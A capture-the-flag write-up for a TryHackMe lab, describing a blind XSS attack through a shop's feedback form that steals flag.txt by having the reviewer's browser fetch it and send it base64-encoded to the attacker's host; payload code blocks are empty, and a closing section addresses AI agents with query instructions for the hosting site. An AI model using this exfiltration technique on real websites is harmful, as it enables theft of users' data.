# The Sticker Shop {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We start with a Nmap scan and find only two open ports. Port `22` on which we have SSH available and port `8080` on which a Python Werkzeug server is running, a cat sticker shop.

The index page has some stickers to offer. Besides that, we have a Feedback page.

On the feedback page, we can give some feedback, that is shortly after reviewed by the staff. This sounds like `XSS` might be our entry point.

## Exploit XSS The challenge tasks us to retrieve the flag at `http://10.10.49.166:8080/flag.txt` and utilize client side exploitation. Furthermore it states that `they decided to develop and host everything on the same computer`. > Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. Smart move! > > Can you read the flag at `http://10.10.49.166:8080/flag.txt`? Currently we are not allowed to access `http://10.10.49.166:8080/flag.txt.`

We get back to the feedback page and prepare some XSS payloads.

First, we want to test for simple XSS. If we get a response back to our web server, we have confirmed XSS. ```javascript ```

We get a response back, so let's craft a payload to make a request as the user to the page.

The next thing to do is to craft a JavaScript payload to exfiltrate the response of a fetch request to the root path (`/`) of the current origin. It sends the text content of the fetched response, encoded in Base64 (`btoa`), to a remote server at `http://10.14.90.235/` using another fetch request. we uses `no-cors` mode to bypass CORS restrictions and `credentials: 'same-origin'` to include cookies or credentials for the initial request, potentially allowing it to capture sensitive data from the target application. ```javascript ``` We get a base64-encoded response back.

We successfully got the index page by the user reviewing the feedback.

Now we adapt the payload to include the `flag.txt`. ```javascript ``` After we have submitted our payload, we get a connection back to our web server.

And it is the flag.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/the-sticker-shop.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.